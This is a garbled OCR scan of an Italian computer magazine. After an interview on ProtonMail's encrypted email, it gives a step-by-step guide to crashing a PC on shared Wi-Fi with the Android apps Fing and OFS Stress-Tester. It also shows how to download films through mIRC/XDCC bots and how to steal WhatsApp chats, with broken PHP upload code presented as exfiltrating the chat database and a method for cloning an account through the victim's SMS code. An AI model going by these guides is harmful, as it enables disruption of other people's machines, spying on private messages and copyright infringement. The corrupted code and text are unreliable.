così da non avere fisicamente alcun dato sensibile 
sui nostri server. Solo l'utente può decifrare i dati 
poiché tutto quello che abbiamo è crittografato. 

I server di ProtonMail risiedono in Svizzera... 
come mai questa scelta? 

La Svizzera è uno dei pochi paesi al mondo dove la 
privacy è ancora ben protetta dalla legge. In Sviz¬ 
zera, un fornitore di applicazioni come ProtonMail 


non può essere costretto a fare sorveglianza nostri 
utenti. Inoltre, tutte le richieste di sorveglianza de¬ 
vono passare attraverso i tribunali. Naturalmente, in 
quanto scienziati del CERN, decidere di posizionare 
i nostri server in Svizzera è stato anche molto con¬ 
veniente per noi, perché viviamo e lavoriamo nella 
zona di Ginevra. 

Perché gli utenti dovrebbero usare ProtonMail? 
Quali sono i suoi punti di forza? 

La forza principale di ProtonMail è che incorpora 
un elevato livello di sicurezza in una soluzione che 
è molto facile da usare. Con ProtonMail, finalmente 
abbiamo una soluzione sicura per la comunicazione 
tramite e-mail criptata, ma allo stesso tempo sem¬ 
plice da utilizzare per gli utenti. 

ProtonMail: perché avete scelto questo nome? 

Ci sono un sacco di motivi e tutti sono piuttosto 
"nerd" In primo luogo molti di noi lavorano all'espe¬ 
rimento Large Hadron Collider del CERN, che è un 
collisore protone/protone. Abbiamo voluto rico¬ 
noscere il nostro lavoro anche nel nome del nostro 
servizio e-mail. In secondo luogo, i protoni sono 
carichi positivamente, e anche loro non decadono. 
Allo stesso modo, abbiamo sviluppato ProtonMail 
per avere un impatto positivo sul mondo e inten¬ 
diamo che lo sia per un tempo molto lungo. Anche 
se, devo dire, nel mondo che vorremmo, ProtonMail 
non dovrebbe essere necessario, ma purtroppo non 
siamo ancora arrivati a questo punto. 

Il software è ancora in versione beta: le sue 
funzionalità sono limitate o può essere già 


utilizzato per inviare e ricevere e-mail in ma¬ 
niera sicura? 

Sì, è già possibile usarlo per comunicare in sicurezza. 
All'interno della nostra azienda già lo utilizziamo 
perché abbiamo naturalmente bisogno di sicurezza. 
Ci sono decine di migliaia di utenti che già utilizza¬ 
no ProtonMail e stiamo lavorando duramente per 
costruire la nostra infrastruttura per supportare gli 
utenti in lista d'attesa, che ormai si contano a centina¬ 
ia di migliaia. Non avevamo previsto che la domanda 
globale per la privacy fosse stata così grande. 

Quando verrà rilasciata la relase definitiva? 

Non abbiamo un calendario prestabilito, perché 
quello che abbiamo imparato è che la sicurezza 
non può essere affrettata. Probabilmente non ci 
sarà mai un rilascio finale perché la sicurezza è una 
battaglia costante che richiede costante innovazione 
e miglioramenti per rimanere davanti agli attaccanti. 
Detto questo, il software sarà abbastanza stabile da 
essere fuori beta entro la fine dell'anno, anche se d 
saranno continuamente upgrade successivi. 

Quali altri progetti avete per il futuro? 

Il nostro sogno da qui a 10 anni è che tutte le co¬ 
municazioni di tutto il mondo siano criptate con la 
tecnologia end-to-end. Sarà una battaglia difficile, 
ma riteniamo che sia assolutamente essenziale per 
la società. In futuro, oltre alla posta elettronica, la¬ 
voreremo anche sulla garanzia di altre forme di 
comunicazione. La posta elettronica è in realtà solo 
il primo passo di questo cammino e siamo molto 
felici di vedere così tante persone in tutto il mondo 
a sostegno di questa causa. 


proteggere la sua (e la nostra) privacy 
on-line. Creò quindi un gruppo di 
Facebook rivolto ai suoi colleghi su 
cui pubblicò una pacifica “chiamata 
alle armi” per fermare lo strapotere 
e l'inaccettabile intromissione della 
NSA nella vita privata degli inter¬ 
nauti di tutto il mondo. Dopo lunghe 
discussioni tecniche, quattro ricer¬ 
catori (lo stesso Andy Yen insieme a 
Jason Stockman, Wei Sun e Tingtao 
Zhou), si ritrovarono attorno ad un 
tavolino di uno dei ristoranti dell’Or¬ 
ganizzazione Europea per la Ricerca 
Nucleare, il CERN appunto: era il 
primo agosto del 2013 e quel giorno 
furono gettate le basi per lo sviluppo 
di ProtonMail. 

La sicurezza è svizzera 

ProtonMail è ancora in fase di svi¬ 
luppo (il client è in versione beta) e 
l’accesso alla piattaforma avviene per 
il momento soltanto su invito (leggi il 


Macropasso della pagina precedente 
per scoprire come ottenerne uno). 
Siamo comunque riusciti a provar¬ 
lo in anteprima per testarne la sua 
reale efficacia e sicurezza. Il primo 
impatto è stato quello di un client di 
posta davvero minimale e semplice 
da usare: l’interfaccia ricorda molto 
quella di Gmail, ma la vera partico¬ 
larità è che i nuovi messaggi vengono 
subito criptati usando un algoritmo 
di crittografìa di tipo end-to-end, di¬ 
rettamente nel browser dell’utente, 
prima di transitare su Internet e prima 
ancora di arrivare ai server stessi di 
ProtonMail. Questa particolare tec¬ 
nologia è basata sullo standard aperto 
OpenPGP che consente a chiunque di 
ricevere e inviare messaggi criptati 
tramite posta Web based o altri si¬ 
stemi (applicazioni per smartphone e 
tablet, per esempio). Il nome “End-to- 
End” deriva proprio dalla metodologia 
con cui tale sistema di crittografia 


opera: il messaggio, una volta scrit¬ 
to, viene cifrato e inviato. Durante il 
suo percorso i dati possono essere 
intercettati, ma non risultano leggibili 
senza l’apposita parola chiave in pos¬ 
sesso esclusivamente del destinatario 
che permette, tramite un algoritmo, 
di decifrare le informazioni contenute 
dentro i pacchetti che viaggiano in 
Rete. ProtonMail, per una maggiore 
sicurezza, effettua una criptazione 
anche dell’intera casella di posta. Do¬ 
po aver inserito usemame e password 
sarà necessario specificare una parola 
chiave segreta per decrittare l’intero 
archivio messaggi. Così facendo, an¬ 
che in caso di attacco informatico, 
tutti i dati presenti sui server di Pro¬ 
tonMail risultano illeggibili. 

Lo scandalo Datagate ha dimostrato 
come nessun sistema di sicurezza è ef¬ 
ficace al 100%, ma di certo ProtonMail 
alza di molto il livello di protezione 
delle nostre comunicazioni. 



UN PROGETTO 
DA SOSTENERE 

L'accesso alla piatta¬ 
forma ProtonMail è al 


momento soltanto su 
invito. Per garantirne lo 
sviluppo, i suoi sviluppa¬ 
tori hanno avviato una 
campagna di raccolta 
fondi su Indiegogo: 
l'obiettivo era quello di 
raggiungere la somma 
di 100.000 dollari, ma 
al momento di andare 
in stampa le donazioni 
hanno superato i 349.285 
dollari! ProtonMail sarà 
disponibile anche per iOS 
eAndroid. 
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Metti KO il PC 
col telefonino 


Uno smartphone nelle mani di un pirata può bloccare 
computer e siti Web. Ecco perché 


“D 

■^0 


I atemi un PC e bloccherò il mondo 
intero". Parafrasando Archimede, 
questo è ciò che direbbe al giorno 
d'oggi un qualsiasi hacker che abbia conoscenze 
neanche tanto approfondite. Già, perché se 
da un lato studiare i meccanismi che stanno 
alla base deirinformatica e della rete Internet 
può sembrare un po’ ostico, dall'altro i tool 
che riducono ogni operazione fraudolenta ad 
una manciata di clic di certo non mancano. 
Tool che, nella maggior parte dei casi, nascono 
con lo scopo di testare la sicurezza di questo o 
quel sistema ma che, vuoi o non vuoi, vengono 
poi utilizzati anche da malintenzionati (im¬ 
provvisati e non) per scopi tutt'altro che nobili. 
Ma il mondo dell’informatica sta velocemente 


cambiando, o meglio, sta mutando il modo di 
approcciarsi al computer stesso. 

L’attacco che non ti aspetti 

Gli utenti tendono ad accendere sempre meno 
il PC a vantaggio di smartphone e tablet che 
permettono di navigare, controllare la posta 
elettronica, editare documenti di testo e giocare 
comodamente seduti sul divano o in metropo - 
litana. Se non ci crediamo, proviamo a testarlo 
sulla nostra stessa pelle. Quanto tempo trascor¬ 
revamo di fronte al monitor 5 anni fa? Quanto 
oggi? La stessa cosa, purtroppo, vale anche per i 
pirati che, non avendo molto tempo da perdere, 
preferiscono demandare le loro malefatte allo 
smartphone piuttosto che al PC. Ed è così che, 



■ Ecco l’anatomia di un attacco DoS distribuito, dove un hacker sfrutta più computer (che a loro volta 
possono utilizzarne di altri creando una sorta di reazione a catena) per sferrare l’attacco ad un altro PC o 
ad un qualsiasi server. Maggiore è il numero di macchine attaccanti, maggiori saranno le probabilità di 
successo da parte del pirata. 


negli ultimi anni, un numero sempre maggiore 
di applicazioni "borderline" hanno fatto il loro 
debutto sul GooglePlay Store, il negozio virtuale 
di Android dal quale è possibile scaricare mi¬ 
gliaia di contenuti. Applicazioni che tornano 
utili al pirata che può così agire indisturbato e 
senza dare troppo nell’occhio anche nei locali 
pubblici dove, magari, è presente un hotspot 
Wi-Fi di libero accesso. Cosa può fare? Ad esem¬ 
pio, bloccare il nostro computer. Ma la cosa più 
sconcertante di tutte è che gli bastano davvero 
pochi tap ed una conoscenza informatica pari 
a zero. Potenzialmente, chiunque potrebbe 
diventare hacker in 5 minuti! 

DoS: non è un sistema 
operativo 

I nostalgici delTinformatica di un tempo o i più 
informati senz'altro conosceranno l’MS-DOS, 
il primo sistema operativo di casa Microsoft. 
Oggi non parleremo del caro e vecchio Disk 
Operating System, ma di una tecnica utiliz¬ 
zata dai pirati che differisce non solo per una 
“o” minuscola invece che maiuscola. Stiamo 
parlando del Denial of Service una tecnica 
che, per quanto banale, è capace di mettere 
a repentaglio la sicurezza di un qualsiasi PC 
o dispositivo capace di connettersi a Internet. 
Ma vediamo di capirne di più. Ogniqualvolta 
decidiamo di visitare un sito Web, ad esempio, 
inviamo un’esplicita richiesta ad un server (ap - 
parentemente digitando l’URL da raggiungere 
nella barra degli indirizzi del browser) che, dopo 
averci identificati (osservando unicamente 
Tindirizzo IP della nostra connessione), decide 
di “aprirci le porte” visualizzando dei contenuti 
(il sito Web stesso). In poche parole, generia¬ 
mo del traffico dati e ogni server (per i meno 
esperti, di fatto un computer), in base alle sue 
caratteristiche hardware e software, è in grado 
di gestirne una certa quantità. Server di servizi 
Web abbastanza visitati (ad esempio Facebook) 
sono in grado di reggere l’arrivo simultaneo 
di milioni di richieste. Ma altri server, magari 
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India 

6 , 57 % 


Turchia 

5 , 84 % 


China 

19 , 09 % 


Tailandia 

13 , 59 % 


UN ANNO DI ATTACCHI DDOS IN NUMERI 


O 26.09% 


Incremento di attacchi DDoS in un anno 

© '.42% 


Incremento di attacchi diretti 
alle applicazioni Web 
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Durata media di un attacco 
(da 32,21 a 22,88 ore) 

O 28.95% 


Italia 
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7 , 33 % 


Regno Unito 
8 , 49 % 


2012 2013 


.Brasile 

5 , 30 % . .. _ 

-Arabia Saudita 

4 , 43 % 

Stati Uniti 
23 , 62 % 


Pacchetti DoS inviati al secondo (da 4,22 
Mppsa 10,60 Mpps 


11 dieci paesi in cui si è verificato il maggior numero di attacchi DDoS nell'anno 2013 


quelli di siti Internet poco frequentati, difficil¬ 
mente riescono a gestire traffici abbastanza 
elevanti. Così, al superamento della "soglia 
limite” di richieste, il server stesso va in panne, 
non avendo più le risorse hardware e software 
necessarie per servire il flusso di visitatori. In 
alcuni casi, questa è una condizione del tutto 
casuale. In altri, invece, sarà un’azione di na¬ 
tura prettamente dolosa. Eccoci di fronte ad un 
attacco DoS, con il quale un pirata invia un gran 
numero di richieste ad una risorsa (un sito Web, 
così come un normalissimo computer collegato 
nella rete locale), fino a renderlo inutilizzabile. 
La soluzione? Tutto riprenderà a funzionare non 
appena il server (o il PC locale) verrà riavviato 
o il numero di richieste scenderà nuovamente 
a livelli sopportabili. 


Android amico del pirata 

Tuttavia, per mettere a repentaglio l’opera¬ 
tività di un qualsiasi server Web sarebbero 
necessarie migliaia di richieste simultanee 
e, salvo casi eccezionali, un solo computer 
attaccante non sarà quasi mai in grado di 
raggiungere il malevole scopo. In questi ca¬ 
si, i pirati mettono in pratica il cosiddetto 
DDoS, ovvero un attacco Denial of Service 
distribuito. In poche parole, un gruppo di 
computer (e non più uno solo) lavora ad un 
preciso scopo: mettere KO il server bersaglio. 
La stessa cosa, però, non si può dire nel caso in 
cui l’obiettivo del pirata sia quello di bloccare 
un computer locale, connesso alla stessa rete 
cablata o Wi-Fi. Proprio in questi casi Android 
gli torna davvero molto utile. L’attacco DoS 


può essere infatti sferrato maneggiando il 
solo smartphone o tablet che, fra le tante cose, 
non deve disporre neppure dei permessi di 
amministrazione (in gergo tecnico, non deve 
essere rootato). Tutto quello che gli occorre 
è racchiuso in due “semplici" applicazioni 
scaricabili gratuitamente dal Play Store. Per 
la natura di test di tali app, Google non ha 
mai pensato di rimuoverle dal suo store. Nel 
frattempo, chiunque ne venga a conoscenza, 
più o meno consciamente, mette a repentaglio 
la sicurezza di ogni PC connesso sulla stessa 
rete. In poche parole, il pericolo viaggia (a 
piede libero) sul Play Store e quello strano 
tizio seduto di fronte a noi al bar potrebbe 
essere la causa del blocco improvviso del 
nostro computer portatile! ► 
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I PIRATI DEL WI-FI 

Come abbiamo scoper¬ 
to, al pirata bastano 
davvero pochi secondi 
per sferrare il suo attac¬ 
co ad un PC connesso 
alla stessa rete senza 
fili. Dunque, se non na¬ 
vighiamo da un hotspot 
Wi-Fi pubblico possiamo 
ritenerci al sicuro? As¬ 
solutamente no, perché 
grazie ad altre applica¬ 
zioni disponibili per An¬ 
droid (come ad esempio 
WPA Tester), il pirata è 
in grado di invadere la 
nostra rete senza fili, 
scardinando ad esempio 
le password predefi¬ 
nite del router Alice o 
Fastweb.il nostro con¬ 
siglio è dunque quello 
di settare una password 
abbastanza complessa 
e, se possibile, di 
cambiarla abbastanza 
frequentemente. 


Ecco le mosse compiute dal pirata per sferrare un attacco DoS direttamente dal suo smartphone 
Android. Gli bastano pochi tap per mandare in tilt qualsiasi PC collegato alla stessa rete locale! 
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^ A caccia di indirizzi IP 

■| ! Il pirata accede al Play Store e da qui ricerca e Instal¬ 
la l’app gratuita Flng. Con il telefonino connesso ad una 
Wi-Fi, awia l'applicazione appena installata e attende qualche 
secondo per visualizzare la lista dei dispositivi connessi alla rete. 
Annota l’indirizzo IP del PC che ha scelto come bersaglio. 


m La giusta applicazione 

2 Fatto ciò, al pirata non resta che fare un altro salto nel 
Play Store per ricercare l’applicazione (sempre gratuita): 
OFS Stress-Tester, un software che nasce per scopi sperimenta¬ 
li, ma che utilizzerà per sferrare l'attacco DoS. Tappa quindi sul 
pulsante Installa e attende il termine del download. 
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^ Il bersaglio è sotto tiro! 

3 I II pirata avvia OFS Stress-Tester e compila il campo Tar¬ 
get IP/Domain con l'indirizzo che ha annotato al Passo 
1 Seleziona poi PHP Serverò Java Serverà seconda dei ser¬ 
vizi installati sulla macchina da attaccare (per portare a termine 
l'attacco è necessario che almeno uno dei due risulti installato). 


^ le dimensioni sono importanti 

Da PacketSize imposta la dimensione (in termini di KB) 
dei pacchetti da inviare. Tale valore cambia in base alla 
tipologia di macchina da attaccare e il più delle volte sono neces¬ 
sari diversi test prima di trovare il valore capace di mettere KO II 
sistema vittima. Stesso discorso vale per Threads. 
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^ L’attacco è appena iniziato! 

g I II pirata è pronto per dare il via alla sua malefatta. Prima, 
però, tappa su Impostazioni (presente in alto a destra 
nell’Interfaccia di OFS Stress-Tester) e seleziona Show Informa¬ 
tion in modo da avere delle informazioni più complete durante 
la fase di attacco (utili per trovare il giusto setup del Passo 4). 


-x La vittima è fuori uso 

0 II pirata è pronto a lanciare il suo DoS: tutto quello che 
gli manca è tappare su Start e attendere che il bersaglio 
venga raggiunto. Sul display viene mostrato anche il numero di 
pacchetti inviati e, se tutto è andato liscio come l'olio, dopo qual¬ 
che secondo (o minuto) la vittima si ritroverà col PC bloccato! 
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lo scarico dalla 
chat proibita 


C’è chi ha trovato il modo di sfruttare il “vecchio” Client 
mIRC per lare incetta di film e serie TV... anche in HD! 


Cosaci 

occorre 


CLIENT IRC 

MIRC 

Quanto costa: 

Shareware 

Lo trovi su: miD 
Sito Internet 

www.mirc.com 


A cronimo di Internet Relay Chat, IRC 
è un protocollo di comunicazione 
(quindi un insieme di regole) nato 
nel "lontano” 1988 per consentire la comu¬ 
nicazione rapida e in tempo reale tra due o 
più computer, quindi persone, utilizzando il 
concetto di stanze, meglio note come canali 
all’interno dei quali chiacchierare come in 
una sorta di bar virtuale. L'architettura è 
l’usuale client/server. In sostanza un server 
IRC fornisce il servizio e gli utenti, utilizzan¬ 
do un programma Client (mIRC, nel nostro 
caso), si collegano dapprima al server quindi 
al canale, o a più canali in contemporanea, a 
seconda delle proprie preferenze o interessi. 


Ogni canale aperto dal server ha i propri 
operatori i quali, gerarchicamente dall’alto 
vedono fondatore e cofondatore, che control¬ 
lano sia il canale sia gli utenti, e gli operatori 
che tengono d’occhio gli utenti ovvero coloro 
i quali utilizzano un client IRC. 

Il P2P che non ti aspetti 

Con il tempo il protocollo IRC vede una evo¬ 
luzione non da poco: se da un lato è rimasto 
l’uso di base per lo scambio di opinioni, 
suggerimenti, aiuto su svariati argomenti a 
seconda del canale scelto (o appositamente 
creato), dall'altro si sta dimostrando un 
ottimo sostituto a software per il downlo¬ 


ad condiviso tipicamente del Peer to Peer 
(P2P) come eMule o il Torrent con pTorrent 
e simili. Questo perché il client mIRC appo- 
sitamente configurato, e vedremo come, 
permette di scaricare, senza attese, qua¬ 
lunque tipo di file a velocità sempre elevata 
e, soprattutto, costante. mIRC, può essere 
liberamente scaricato in modalità share¬ 
ware a 30 giorni: scaduto questo periodo 
di prova si può decidere se procedere alla 
registrazione delle licenza al costo di 20 
dollari, oppure continuare ad utilizzarlo in 
modalità shareware accettando la visualiz¬ 
zazione di un banner pubblicitario all’avvio 
del programma. 


□ Installiamo mIRC 


Prima di poter porre domande, quesiti tecnici o soltanto frequentare per curiosità questi bar virtuali, dobbiamo 
procedere all’installazione del Client di chat La procedura richiede solo pochi clic. 



^ Avviamo l'installazione 

La procedura di installazione non è affat¬ 
to differente dall'usuale: una volta sca¬ 
ricato l’eseguibile mirc732.exe dal Win DVD- 
Rom, clicchiamoci due volte sopra e autorizzia¬ 
mo l’installazione per avviare il Wizard. Nella pri¬ 
ma schermata clicchiamo Next e spuntiamo la 
voce lAgree. 


^ Scegliamo la directory 

Nella nuova schermata Choose Instali 
Location decidiamo in quale cartella 
installare il software: se il percorso di default 
proposto ci va bene confermiamo con un clic sul 
pulsante Next, altrimenti clicchiamo Browse e 
scegliamo un nuovo percorso. Quindi premiamo 
Next per terminare. 


^ Le componenti necessarie 

Nella finestra Choose Components 
disattiviamo alcune proprietà aggiuntive 
di mIRC. Di default vengono tutte spuntate per 
l’installazione e suggeriamo di mantenere que¬ 
sta impostazione al fine di avere un programma 
completo di tutto, help in linea compreso. Quindi 
clicchiamo Next. 
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Troviamo i canali 


giusti 


Terminata l'installazione di mIRC, analizziamo la procedura di base che ci permetterà di collegarci ad un canale 
e “chiacchierare” con gli altri utenti, proprio come se usassimo un normale Client di chat 



^ Siamo subito onerativi 

In Select Additional Tasks aggiungiamo 
una voce sul desktop o nel menu cosi come 
la verifica automatica degli aggiornamenti. A noi la 
scelta a seconda delle preferenze. Spuntiamo Run 
as Portable Application solo se mIRC è su chiavet¬ 
ta USB. Cucchiamo quindi Nexte Instali. 



^ Il server che piace a noi 

Rimaniamo in Options e a sinistra selezio¬ 
niamo Servers. Per aggiungerne uno cuc¬ 
chiamo Add. Nella finestra Add Server, in Descrip- 
tion inseriamo il nome evocativo della rete (ad 
esempio SimoSnafì e in //?C Server l'indirizzo IRC 
(ad esempio irc.simosnap.corrt). Cucchiamo Add. 



^ Ecco l’elenco dei canali 

7 Se provassimo a scrivere qualche cosa ci 
verrà restituito un eloquente You are not a 
channel perché dobbiamo entrare in almeno uno 
dei canali messi a disposizione dal server al qua¬ 
le siamo collegati. Per l'elenco digitiamo sul rigo 
in basso il comando /list quindi premiamo Invio. 


^ Il primo avvio di mIRC 

Terminata l'installazione decidiamo se avvia¬ 
re mIRC spuntando la casella Run mIRC e 
cucchiamo Finish. Al primo avvio potrebbe compa¬ 
rire sul monitor il messaggio di avviso Windows fire¬ 
wall ha bloccato alcune funzionalità del programma: 
clicchiamo sul pulsante Consenti accesso. 



-x Le ultime scelte 

g Tornati in Servers selezioniamo quello appe¬ 
na aggiunto e clicchiamo Select per essere 
rimandati alla finestra Connect. Nel campo Server 
apparirà il nome della rete appena scelta, ad esem¬ 
plo, NewFunPower, ma può cambiare a seconda 
del nome riportato in Description (Passo B4). 



^ Scegliamo i canali giusti 

g Verranno elencati tutti i canali disponibili. 

Cliccando col tasto destro su uno di essi 
verrà aperto un menu dal quale sarà possibile 
entrare nel canale ( Join Channel), aggiungerlo ai 
favoriti (Add to Favoriteci o ordinare i canali ( Sort 
by) in base al nome numero di utenti e così via. 


Le credenziali di accesso 

3 CI verrà ricordato che II software è share¬ 
ware a 30 giorni: clicchiamo Contìnue. Ver¬ 
rà aperta la finestra Options (presente nel menu 
Tools) alla sezione Connect. a destra, in Nickna- 
me, digitiamone uno e in Alternative uno alternati¬ 
vo nel caso il primo fosse già presente nel canale. 



^ Connessione al server 

g Clicchiamo Connect per connetterci al ser¬ 
ver. Apparirà la finestra mIRC Favorites in 
primo piano, che chiuderemo dopo aver rimosso il 
segno di spunta dalla casella Pop up favorites on 
connect per avere finalmente il punto di partenza 
di mIRC per commenti e comandi: il rigo in basso. 



Entriamo in una stanza 

0 Individuato l'argomento che ci interesse (ad 
esempio Formulai), clicchiamo due volte sul 
nome del canale oppure selezioniamo Join Channel 
(Passo B8), per ritrovarci all’interno, è buona norma 
quando si entra salutare con un semplice ciao, altri¬ 
menti si rischia di essere subito bannati! 
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Una chat anche per il download 


Analizziamo adesso la procedura da seguire per scaricare file con mIRC. Ma prima occorre un minimo 
di configurazione del Client. Ecco quindi come procedere per evitare ogni possibile intoppo. 





± Il primo passo 

Spostiamoci nel menu Tools, quindi sele¬ 
zioniamo la voce Options. Dal pannello di 
sinistra espandiamo la voce Connecte optiamo 
per Identd. Lasciamo spuntata solo la casella Ena- 
ble only when connecting. Non clicchiamo su OK, 
ma spostiamoci su DCC nel pannello di sinistra. 



Una semplice configurazione 

In On send reguest selezioniamo Auto-get 
file and spuntando minimize. Dal menu a 
tendina Iffile exists selezioniamo Résumé. Ripe¬ 
tiamo, facoltativamente, la medesima configurazio¬ 
ne nella sezione in basso, On Chat request, oppure 
scegliamo Ignore alt. A noi la scelta. 



Scegliamo la destinazione 

Non clicchiamo su OK, ma spostiamoci su 
Folders. Clicchiamo Add per aprire la fine¬ 
stra DCC GetFolder. premiamo Into this folderper 
scegliere o creare una nuovo percorso per il down¬ 
load. Naturalmente questo passaggio è facoltativo 
se la cartella di destinazione è di nostro gradimento. 



L’ultimo passo 

l Spostiamoci su Ignore e dal menu a tendi¬ 
na Method selezioniamo la voce Disabled. 
In basso rimuoviamo quindi il segno di spunta dal¬ 
la casella di controllo Turn ignore back on in. Ora 
aggiungiamo un server secondo la modalità che 
abbiamo imparato nella precedente pagina. 




^ Effettuiamo il collegamento 

Dal bot della chat arriverà, generalmente in 
privato, ma non è la regola, un messaggio 
(testo con sfondo blu) che ci inviterà a compiere 
delle azioni, Nello specifico dovremo cliccare due 
volte sul link riportato per aprirlo nel browser: clic¬ 
chiamo Yes nella popup Link Waming. 


^ Come si scarica? 

Decidiamo si usare la rete Darksin, ma 
qualsiasi altro nome va bene purché ricordi 
il server al quale ci colleghiamo, con indirizzo ire. 
darksin.net. Colleghiamoci al server e otteniamo 
l'elenco dei canali (comando/list) eventualmente 
ordinando il risultato secondo le nostre preferenze. 



^ Finalmente la lista! 

g Come da istruzioni fornite clicchiamo sul 
banner e riportiamone l’indirizzo con un 
copia&incolla nel messaggio privato (stanza Ban- 
ner-Universal in figura, ma i nomi sono svariati e 
diversi). Premiamo Invio e il bot ci risponderà con 
un nuovo link e la procedura per ottenere l'elenco. 


^ Richiediamo la lista 

g I numeri che appaiono sulla seconda colon¬ 
na rappresentano il numero di utenti per 
ogni canale. Scegliamo uno tra i più popolati ed 
entriamo nella stanza virtuale. Salutiamo (come al 
solito, basta un semplice ciao) e richiediamo la lista 
dei file digitando il comando ///sf seguito da Invio. 



Avviamo il download 

0 Con l'elenco davanti dovremo clicchiamo sul 
file che ci interessa e seguiamo le istruzioni 
che in genere corrispondono nel riportare in mIRC il 
comando /msg <nomebot> xdcc send ft<numero 
pacchetto> seguito come sempre da Invio. Subito 
dopo partirà il download veloce del file! 
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| Tutti spiati su WhatsApp! | 


Incredibile ma vero! Basta una semplice applicazione 

per sbirciare nelle chat altrui. Svelati tutti i retroscena 


Tutti spiati 
su WhatsApp! 


Cosa ci 
occorre 


O 


APP DI INSTANT 
MESSAGING 

WHATSAPP 

Sito Internet 

https://play.google.com 
Note l'applicazione 
è disponibile anche 
per iOS su 

https://iturra.apple.com 


“A 


d ogni azione corrisponde una 
i reazione uguale e contraria”: co- 
ksì si esprimeva Newton col suo 
terzo principio della termodinamica, che 
trova una sua applicazione non soltanto in 
fisica, ma anche in informatica. Pensiamo, 
ad esempio, alla crescita esponenziale 
della diffusione e adozione dei dispositivi 
mobili: un boom che non conosce misure 
e di certo non ha freni. Ma se i milioni di 
smartphone e tablet venduti diventano 
miliardi (azione), quale sarà il rovescio 
della medaglia (reazione)? La risposta, c’è 
da ammetterlo, non è scontata, ma esiste 
un aspetto che di certo non può essere 
ignorato per il rischio intrinseco che si 
porta dietro: il pericolo privacy. La certez¬ 
za dell’inviolabilità in qualsiasi sistema 
informatico è un obiettivo irraggiungibile 
e questo ce lo insegna sia la storia sia le 
innumerevoli testimonianze di esponenti 
di spicco nell’ambiente hacker. 


La nostra vita in un file 

Per chi non lo sapesse, WhatsApp salva pe¬ 
riodicamente tutto il nostro storico delle 
conversazioni in un unico file nella memoria 
esterna (qualora sia disponibile) del nostro 
smartphone Android (o iOS). Recentemente, 
però, è stata fatta una scoperta alquanto 
sconvolgente: a quanto pare, una qualsiasi 
applicazione che contenga al suo interno il 
modulo e i permessi per accedere in lettura 
e scrittura alla memoria esterna del disposi¬ 
tivo, può non solo “intercettare” il database 
con le nostre chat, ma anche decriptarlo e 
quindi leggerne il contenuto senza alcu¬ 
na difficoltà. Dopo questa (inquietante) 
scoperta sono iniziate a fioccare in Rete le 
guide pratiche su come "arricchire” un’app 
apparentemente innocua con codice male¬ 
volo, capace di salvare il file contenente le 
conversazioni su un server remoto. A questo 
punto è possibile decriptarne il contenu¬ 
to essendo questo un semplice database 


SQLite3, che può essere poi convertito in 
un formato compatibile con Excel per una 
più veloce consultazione. Basta quindi una 
banale app, come ad esempio la famosa 
Flappy Bird (ma la sorte potrebbe toccare 
a qualunque altra applicazione) modificata 
ad hoc in pochi passi da un malintenziona¬ 
to, e a nostra insaputa verrà compromessa 
fortemente la nostra privacy. 

Nuove protezioni già bucate! 

A seguito di un recente aggiornamento di 
WhatsApp è stata aggiunta la modifica al 
database con le conversazioni cambiando 
la modalità di criptazione, che ora passa al 
formato crypt5. Sono però bastate poco più 
di 48 ore per vedere apparire sul noto forum 
di smanettoni XDA uno script scritto in Py¬ 
thon che scardina anche questa protezione, 
che sembrava potesse mettere una pezza 
ai problemi di privacy che tanto hanno 
afflitto gli utenti del noto servizio di mes- 


ECCO COME I PIRATI SFRUTTANO LA VULNERABILITÀ 7 DI ALCUNE APP MOBILE PER 

Esistono delle applicazioni che racchiudono al suo interno il modulo e i permessi per accedere in lettura/scrittura alla memoria esterna del 
dispositivo. Intervenendo opportunamente sul codice, un malintenzionato sarà in grado di intercettare e decriptare il database. Ecco come. 



pt io for tccting purpoocs orly. 

ilUii = "/iHp/NtMlMpp/”; 

|if ($ «LESl’fll»"Horror"J > e) 

( 

•cho "Crror: • . s riU3(*fllt*J["«rr«r ,, J . "«br*"; 

> 

| else 

. { 

■ echo ’upload: " . $_FXiES( B fHo"H"naa« s ) . "«br»"; 
er.ho "Type: ■ . s_fti P c .["f ile"] ["type"] . 

•Un ’S uv: " . (t_rztcs[”ru* 1> ]["alM"! 1024) . " hb* 

echo "Stored in: * . S_riLC3ffile"]["t»p_na»e"]; 

juoloiorile = suDloaaair . s htKvtKf Ktnoit auuk’1 . 

■ «ove uploaaea_i*ile(J f- il- file ]['me nane'], Soploadfile); 

} 


(> ULtsf’Mie 



3 file_uploads = on 
■ post_max_size = 32M 
5 upload_max_filesize = 32M 



Servendosi di un semplice script in PHP un malintenzionato può 
inserire all'Interno del codice di un'app le istruzioni che indicano 
la cartella su un server remoto in cui archiviare il database con le 
chat di WhatsApp. 


Gli hacker fanno sempre le cose per bene: nel codice malevolo 
inseriscono anche le istruzioni per limitare le dimensioni dei 
database delle chat in modo da non saturare la connessione 
Internet e quindi insospettire la vittima. 
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saggistica istantanea. Siamo quindi punto e 
a capo? Purtroppo sì, almeno fino a quando 
la società (ormai assorbita da Facebook) si 
deciderà ad adottare una contromisura che 
possa definitivamente tranquillizzare i suoi 
milioni di affezionati utenti. 

La posta in gioco è troppo alta, soprattutto 
se si considera che sulla base di quanto sta 
succedendo, si vedono fioccare nuove app di 
messaggistica che promettono il completo 
anonimato e la totale sicurezza dei dati 
scambiati (una su tutte, Telegram). Le brutte 
notizie sono finite? Ancora no... Pare infatti 
che basterebbe un piccolo escamotage per 
“clonare” WhatsApp dal telefono-vittima su 
uno in possesso di un malintenzionato. È 
stato scoperto infatti che, ad esempio, un 
nostro amico fin troppo burlone potrebbe 
leggere in tempo reale (sul suo smartpho¬ 
ne) tutte le chat a cui noi partecipiamo 
sul nostro dispositivo! Gli basta sottrarci 
per qualche minuto il telefono, installare 
WhatsApp nel frattempo sul suo e, quando 
gli viene richiesto di inserire il numero di 
telefono per l’invio del codice di convalida, 
lui inserirà il nostro numero; lui leggerà 
l’SMS dal nostro smartphone e inserirà il 
codice sul suo device completando l’in¬ 
stallazione. Ecco servita una perfetta copia 
delle nostre conversazioni, consultabile 
in tempo reale! Stiamo quindi attenti a chi 
prestiamo il telefono e assicuriamoci di 
effettuare periodicamente dei backup delle 
nostre conversazioni di WhatsApp per poi 
spostarle però in un altro posto, ad esem¬ 
pio sul PC o sul cloud (Dropbox, Google 
Drive ecc). 



2 SOLUZIONI PRONTE ALL'USO PER SPIARE WHATSAPP 

Occorre premettere, innanzitutto, che spiare le chat altrui o i suoi messaggi 
è un'operazione illegale. Per farlo, però, esistono metodi abbastanza semplici 
che analizzeremo a solo scopo didattico! 

1- Fai tutto a costo zero 

' «ftiESffittsr» 

• -w^assss* 

